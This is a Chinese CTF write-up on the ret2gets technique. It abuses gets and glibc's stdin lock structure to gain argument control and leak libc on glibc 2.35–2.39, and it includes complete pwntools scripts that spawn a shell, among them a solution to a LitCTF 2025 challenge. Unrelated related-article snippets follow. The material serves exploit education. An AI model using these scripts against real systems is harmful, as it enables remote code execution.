当前位置: 首页 > article >正文

Ret2gets

[原创]ret2gets的原理与利用方法-Pwn-看雪安全社区专业技术交流与安全研究论坛可以看一下这位师傅写的ret2gets的原理。还是十分详细的。由于在高版本的glibc中删除了__libc_csu_init这个函数。所以导致我们在不清楚libc基地址的情况下很难找到pop rdi这样的gadget来为我们传递一参。正常的ret2libc就基本上利用不了了。在glibc2.35~2.37版本中我们可以来看一下这里的ret2gets是怎么利用的。可以先写一个比较简单的demo。版本是glibc2.35的。#include stdio.h int main() { char buf[0x20]; puts(Can you rop?\n); gets(buf); return 0; }很显然这里不存在pop rdi这种方便的一参。那我们应该怎么办呢可以先运行下程序看看做了什么。from pwn import * context.log_level debug context.arch amd64 ​ io process(./pwn) elf ELF(./pwn) pl ba*0x28 p64(elf.plt.gets) gdb.attach(io) io.sendline(pl) io.sendline(b/binp8(u8(b/)1)bsh) ​ io.interactive()这是我们的测试脚本。可以看到断点打在了发送内容之前。可以看到我们的rdi里存放的是_IO_stdfile_0_lock存放的是libc内的内容。这就为我们泄露libc基地址提供帮助了。首先先看下结构体。typedef struct { int lock; int cnt; void *owner; } _IO_lock_t;我们这里需要利用到里面的两个宏。可以看下源码。glibc2.37#define _IO_lock_lock(_name) \ do { \ void *__self THREAD_SELF; \ if ((_name).owner ! __self) \ { \ lll_lock ((_name).lock, LLL_PRIVATE); \ (_name).owner __self; \ } \ (_name).cnt; \ } while (0) #define _IO_lock_unlock(_name) \ do { \ if (--(_name).cnt 0) \ { \ (_name).owner NULL; \ lll_unlock ((_name).lock, LLL_PRIVATE); \ } \ } while (0)我们可以看到在_IO_lock_unlock里存在对cnt会进行--并判断--后的值是否0。如果等于0那么owner处的值就会被置零。但是owner处是存放着TLS地址的。只要能puts出来我们就拿到了libc基地址了。所以就是说我们输入的第五个字节会被减减。同时要注意puts会有\x00截断所以在owner之前不能存在\x00字节存在。我们可以来看一下如何在没有pop rdi的情况下控制一参。from pwn import * context.log_level debug context.arch amd64 ​ io process(./pwn) elf ELF(./pwn) pl ba*0x28 p64(elf.plt.gets) gdb.attach(io) io.sendline(pl) io.sendline(b/binp8(u8(b/)1)bsh) ​ io.interactive()可以看到通过减一后我们输入的内容刚好就是/bin/sh了。同时这里还实现了对于一参rdi的控制。但是我们这里没有调用system啊光光控制一参有什么用呢所以我们的首要目的是去获得libc的基地址。也就是要去绕过_IO_lock_unlock的检测。from pwn import * context.log_level debug context.arch amd64 ​ io process(./pwn) elf ELF(./pwn) libc ELF(./libc.so.6) pl1 ba*0x28 p64(elf.plt.gets) p64(elf.plt.puts) p64(elf.sym.main) io.sendline(pl1) gdb.attach(io) io.sendline(bA*4b\x00*3) base u64(io.recvuntil(b\x7f)[-6:]b\x00\x00) - 0x3b8740 success(hex(base)) rdi base 0x2a3e5 binsh base next(libc.search(/bin/sh\x00)) pl2 ba*0x28 p64(rdi) p64(binsh) p64(baselibc.sym.system) io.sendline(pl2) io.interactive()这里关键在于bA*4b\x00*3。由于gets会把末尾的\n换成\x00所以我们输入后会变成lock被写入为AAAAcnt被写入为\x00*4。当cnt自减时就会变为一个大数\xff\xff\xff\xff。这样就成功绕过了检测得到了libc基地址。pwndbg tele 0x7ffff7e1ca80 00:0000│ rax rdi 0x7ffff7e1ca80 ◂— 0xffffffff41414141 01:0008│ 0x7ffff7e1ca88 —▸ 0x7ffff7fb8740 ◂— 0x7ffff7fb8740 02:0010│ 0x7ffff7e1ca90 ◂— 0 ... ↓ 5 skipped在得到libc基地址后后面去获得各种gadget就简单多了。上面的实现都基于glibc2.35-2.37版本。在glibc2.37~2.39版本中又对lock增加了检测。还是先看源码。#define _IO_lock_lock(_name) \ do { \ void *__self THREAD_SELF; \ if (SINGLE_THREAD_P (_name).owner NULL) \ { \ (_name).lock LLL_LOCK_INITIALIZER_LOCKED; \ (_name).owner __self; \ } \ else if ((_name).owner ! __self) \ { \ lll_lock ((_name).lock, LLL_PRIVATE); \ (_name).owner __self; \ } \ else \ (_name).cnt; \ } while (0) #define _IO_lock_unlock(_name) \ do { \ if (SINGLE_THREAD_P (_name).cnt 0) \ { \ (_name).owner NULL; \ (_name).lock 0; \ } \ else if ((_name).cnt 0) \ { \ (_name).owner NULL; \ lll_unlock ((_name).lock, LLL_PRIVATE); \ } \ else \ --(_name).cnt; \ } while (0)发现这里只有当cnt!0的时候才可以让cnt--。结合nssctf里的一道题来说明。[LitCTF 2025]master_of_rop链接[LitCTF 2025]master_of_rop - NSSCTF__int64 __fastcall main(int a1, char **a2, char **a3) { _BYTE v4[32]; // [rsp0h] [rbp-20h] BYREF ​ puts(Welcome to LitCTF2025!); gets(v4, a2); return 0LL; }依旧一眼栈溢出。下面给出exp。from pwn import * context.log_level debug ​ #io remote(node4.anna.nssctf.cn,28428) io process(./pwn) elf ELF(./pwn) libc ELF(./libc.so.6) pl1 ba*0x28 p64(elf.plt.gets)*2 p64(elf.plt.puts) p64(0x4011ad) io.sendline(pl1) io.sendline(p32(0)ba*4ba*8) io.sendline(ba*4) base u64(io.recvuntil(b\x7f)[-6:]b\x00\x00) - 0x3ba740#远端换成0x28c0 success(hex(base)) rdi base 0x10f75b binsh base next(libc.search(b/bin/sh\x00)) pl2 ba*0x28 p64(rdi) p64(binsh) p64(rdi1) p64(baselibc.sym.system) #gdb.attach(io) io.sendline(pl2) ​ io.interactive()这里解释一下。这里去使用了两次gets两次往_IO_stdfile_0_lock_里写入内容。第一次先去覆盖cnt的值然后把lock置零防止stdin上死锁卡死进程最后发现好像不管写入什么都会把lock置零然后就是第二次写入把lock再给覆盖然后就可以正常打rop了。这里把lock去置零然后后面会发生抢锁的过程然后会更新owner。好像只要owner地址合法就不会考虑lock的值了也要先咕咕咕了。这种题型比较死板基本照着写就行QAQ。问题是这里远端我调了好久也不知道为什么一直和远端有问题。先咕咕咕吧......

相关文章:

Ret2gets

[原创]ret2gets的原理与利用方法-Pwn-看雪安全社区|专业技术交流与安全研究论坛 可以看一下这位师傅写的ret2gets的原理。还是十分详细的。 由于在高版本的glibc中删除了__libc_csu_init这个函数。所以导致我们在不清楚libc基地址的情况下,很难找到pop…...

2026年Hermes Agent/OpenClaw如何安装?1分钟云端保姆级安装及百炼Coding Plan指南

2026年Hermes Agent/OpenClaw如何安装?1分钟云端保姆级安装及百炼Coding Plan指南。OpenClaw怎么部署?还在为部署OpenClaw到处找教程踩坑吗?别再瞎折腾了!OpenClaw一键部署攻略来了,无需代码、只需两步,新手…...

Go语言如何判断字符串包含_Go语言strings.Contains教程【精通】

...

Dictionary查找指定的Valuem,判断是否有值

在 .NET 里&#xff0c;Dictionary<int, string> 是键值对集合&#xff1a;Key&#xff08;键&#xff09;&#xff1a;int 类型&#xff08;唯一&#xff09;Value&#xff08;值&#xff09;&#xff1a;string 类型1. 查找第一个匹配的 Value&#xff08;最常用&#…...

Python多进程编程实战:提升计算效率的关键技术

1. Python多进程编程入门在数据处理和机器学习领域&#xff0c;我们经常面临大量计算密集型任务。以计算机视觉项目为例&#xff0c;当需要预处理成千上万张图片时&#xff0c;单进程处理方式往往耗时过长。这时&#xff0c;Python的多进程编程就能显著提升效率。现代计算机通常…...

递归语言模型:原理、实现与应用场景解析

1. 递归语言模型基础解析递归语言模型&#xff08;Recursive Language Models&#xff09;是自然语言处理领域近年来备受关注的技术方向。与传统的序列模型不同&#xff0c;递归模型通过树状结构捕捉语言的层级特性&#xff0c;更接近人类语言的实际组织方式。我在实际项目中发…...

贝叶斯定理:从直觉理解到实战应用

1. 贝叶斯定理的直觉理解 贝叶斯定理是概率论中一个看似简单却常被误解的工具。我第一次接触这个公式时&#xff0c;也被它反直觉的特性困扰过——为什么已知结果后还要计算原因的概率&#xff1f;直到用具体案例演练后才恍然大悟。 这个定理的精髓在于动态更新认知。就像医生…...

Amazon ECS Agent 深度解析:架构、部署与生产环境实战指南

1. 项目概述&#xff1a;深入理解 Amazon ECS Agent如果你正在或计划在 AWS 上运行容器化应用&#xff0c;那么Amazon ECS Agent就是你绕不开的核心组件。简单来说&#xff0c;它是部署在每一个 ECS 容器实例&#xff08;通常是 EC2 实例&#xff09;上的“大脑”和“执行者”。…...

Illustrator脚本终极指南:25+免费工具彻底改变你的设计工作流

Illustrator脚本终极指南&#xff1a;25免费工具彻底改变你的设计工作流 【免费下载链接】illustrator-scripts Adobe Illustrator scripts 项目地址: https://gitcode.com/gh_mirrors/il/illustrator-scripts Adobe Illustrator是专业设计师的首选工具&#xff0c;但重…...

抖音下载器终极指南:三步实现免费批量下载与直播回放保存

抖音下载器终极指南&#xff1a;三步实现免费批量下载与直播回放保存 【免费下载链接】douyin-downloader A practical Douyin downloader for both single-item and profile batch downloads, with progress display, retries, SQLite deduplication, and browser fallback su…...

高考历年真题试卷电子版,全国卷+34省地方卷,包含数学英语语文生物化学等9科

2025高考历年真题试卷电子版&#xff0c;全国卷34省地方卷&#xff0c;包含数 学英语语文生物化学等9科&#xff0c;原卷解析版&#xff0c;WordPDF格式&#xff0c;可编辑打印。下单自动发货&#xff0c;百度网盘分享。 百度网盘发货&#xff0c;看清楚哦&#xff0c;介意勿拍…...

多智能体协作框架:从原理到实践,构建高效AI工作流

1. 项目概述&#xff1a;一个面向未来的智能体开发框架最近在开源社区里&#xff0c;一个名为contains-studio/agents的项目引起了我的注意。乍一看这个标题&#xff0c;你可能会觉得它又是一个“AI智能体”框架&#xff0c;毕竟现在市面上这类工具多如牛毛。但当我深入探究其代…...

【微软Build 2026提前剧透】VSCode多智能体任务分配架构图首度公开:含3层决策流、2级缓存机制与SLA保障协议

更多请点击&#xff1a; https://intelliparadigm.com 第一章&#xff1a;VSCode 2026多智能体任务分配架构全景概览 VSCode 2026 引入了原生支持的多智能体协同开发框架&#xff08;Multi-Agent Task Orchestration Engine, MATE&#xff09;&#xff0c;其核心在于将编辑器从…...

深度解析:Ryujinx模拟器的5个颠覆性设计哲学与架构创新

深度解析&#xff1a;Ryujinx模拟器的5个颠覆性设计哲学与架构创新 【免费下载链接】Ryujinx 用 C# 编写的实验性 Nintendo Switch 模拟器 项目地址: https://gitcode.com/GitHub_Trending/ry/Ryujinx 在开源模拟器领域&#xff0c;Ryujinx以其独特的设计理念和架构创新…...

sklearn【MAPE】实战避坑指南:从原理到代码的完整解析

1. 为什么你的MAPE指标总是"爆表"&#xff1f; 我刚入行做房价预测时&#xff0c;遇到过一件特别尴尬的事&#xff1a;模型在测试集上的MSE看着还不错&#xff0c;但MAPE值却高得离谱&#xff0c;直接飙到80%以上。当时我的第一反应是"这模型也太烂了吧"&a…...

图像缩放方法在计算机视觉中的优化与应用

1. 像素缩放方法评估的核心价值在计算机视觉任务中&#xff0c;图像分类模型的性能往往与输入图像的质量密切相关。当我们使用卷积神经网络&#xff08;CNN&#xff09;处理图像时&#xff0c;原始图像尺寸与网络输入层要求的尺寸不匹配是常态而非例外。这就引出了一个基础但关…...

MAA助手:明日方舟终极自动化解决方案的技术架构与实践指南

MAA助手&#xff1a;明日方舟终极自动化解决方案的技术架构与实践指南 【免费下载链接】MaaAssistantArknights 《明日方舟》小助手&#xff0c;全日常一键长草&#xff01;| A one-click tool for the daily tasks of Arknights, supporting all clients. 项目地址: https:/…...

基于CAVM架构的金融研究智能体系统FinSight实战指南

1. 项目概述与核心价值如果你在金融行业&#xff0c;或者对投资研究感兴趣&#xff0c;一定经历过这样的痛苦&#xff1a;为了写一份像样的公司分析报告&#xff0c;你得在Wind、Bloomberg、Choice之间来回切换&#xff0c;手动下载财报数据&#xff0c;用Excel画图&#xff0c…...

2026届必备的六大降重复率平台解析与推荐

Ai论文网站排名&#xff08;开题报告、文献综述、降aigc率、降重综合对比&#xff09; TOP1. 千笔AI TOP2. aipasspaper TOP3. 清北论文 TOP4. 豆包 TOP5. kimi TOP6. deepseek 面对人工智能生成内容也就是 AIGC 当下越发普遍的情形&#xff0c;让其自动化特性得以降低进…...

LSGAN原理与Keras实现:提升生成对抗网络训练稳定性

1. LSGAN基础概念与核心优势 在传统GAN训练中&#xff0c;判别器使用sigmoid交叉熵损失函数&#xff0c;这容易导致梯度消失问题。LSGAN&#xff08;最小二乘生成对抗网络&#xff09;通过将判别器的损失函数替换为最小二乘损失&#xff0c;有效改善了这一问题。我第一次尝试LS…...

[特殊字符]基于Vue与Django构建的高性能电商网站系统(含完整源码+部署指南)

温馨提示&#xff1a;文末有联系方式 技术架构说明 本电子商城系统采用主流前后端分离架构&#xff1a;前端基于轻量高效、生态丰富的Vue.js框架开发&#xff1b;后端依托功能强大、安全稳定的Django Web框架&#xff1b;核心开发语言为Python&#xff1b;数据持久层选用高性能…...

InfoGAN原理与Keras实现:可控生成对抗网络详解

1. 项目概述&#xff1a;理解InfoGAN的核心价值在生成对抗网络&#xff08;GAN&#xff09;的世界里&#xff0c;InfoGAN代表着一次重要的技术突破。传统GAN模型虽然能生成逼真样本&#xff0c;但其潜在空间缺乏可解释性——我们无法控制生成样本的具体特征。InfoGAN通过引入互…...

MIUI自动化任务脚本:3个核心技巧解决小米社区重复性工作

MIUI自动化任务脚本&#xff1a;3个核心技巧解决小米社区重复性工作 【免费下载链接】miui-auto-tasks 一个自动化完成小米社区任务的脚本 项目地址: https://gitcode.com/gh_mirrors/mi/miui-auto-tasks 你是否厌倦了每天手动登录小米社区完成签到、观看视频、领取积分…...

落地台灯怎么选?内行才知道的挑选技巧,家长必看避坑干货

​说到大路灯挑起来真是让人头大&#xff01;光线不够、频闪严重、眩光刺眼&#xff0c;用久了眼睛疼&#xff0c;这些问题真是防不胜防。网络上大路灯那么多&#xff0c;现实谁不想给自己的眼睛安排个舒适的光环境呢&#xff1f;很多朋友都在问&#xff0c;市面上那么多大路灯…...

投稿踩坑3个月,被拒两次才发现:一开始的选刊方向就错了

上个月终于接到了Accept通知&#xff0c;但回头看这整个投稿周期&#xff0c;真是一把辛酸泪。从去年年底开始投&#xff0c;到今年4月才正式被接收&#xff0c;中间被拒两次&#xff0c;每次审稿都要等一个多月。最难受的不是文章有问题&#xff0c;而是浪费了整整三个月才发现…...

Cursor + Claude Code 接入 API 实战:国内稳定使用 Claude 4.7 配置全攻略

官方 API 国内直连必败&#xff0c;本文给出 Cursor 和 Claude Code 两套完整配置方案&#xff0c; 图文步骤可直接照做&#xff0c;配置完成后无需代理&#xff0c;延迟稳定在 200ms 以内。为什么官方地址不能用&#xff1f; Anthropic 官方 API 地址 api.anthropic.com 在国内…...

Claude Scientific Skills:134个技能打造桌面AI科学家,加速科研工作流

1. 项目概述&#xff1a;将你的AI助手打造成桌面AI科学家 如果你是一名科研工作者、数据分析师或工程师&#xff0c;大概率经历过这样的场景&#xff1a;面对一个复杂的科学计算任务&#xff0c;比如分析单细胞RNA测序数据、进行虚拟药物筛选&#xff0c;或是整合多组学数据寻…...

【AI Agent实战】公众号排版丑?AI帮你一键改造成「课堂型」高级感

排版不是锦上添花&#xff0c;是决定读者能不能读完的第一道门槛。之前&#xff1a;Markdown直发&#xff0c;打开率不低但完读率很低 养虾系列前7篇&#xff0c;我的排版流程是&#xff1a; Markdown写完粘贴到公众号编辑器加几个加粗、调一下字号发 打开率还行&#xff08;标…...

基于大语言模型的代码仓库智能文档生成:RepoAgent实战指南

1. 项目概述&#xff1a;当大模型遇上代码仓库&#xff0c;一个智能文档助手的诞生 在软件开发的世界里&#xff0c;我们常常面临一个经典困境&#xff1a;接手一个新项目&#xff0c;面对一个庞大而陌生的代码仓库&#xff0c;如何快速理解它的整体架构、模块划分和核心逻辑&…...

C语言刷题日记 #6

C语言刷题日记 #7&#xff08;2026.04.14-2026.04.21&#xff09; 本周概览 进入四月的第三周&#xff0c;转专业申请的号角正式吹响了。4月15日至4月21日&#xff0c;于我个人而言是异常忙碌的一周——我咬着牙改完了个人陈述的第九版&#xff0c;提交了转专业申请表&#x…...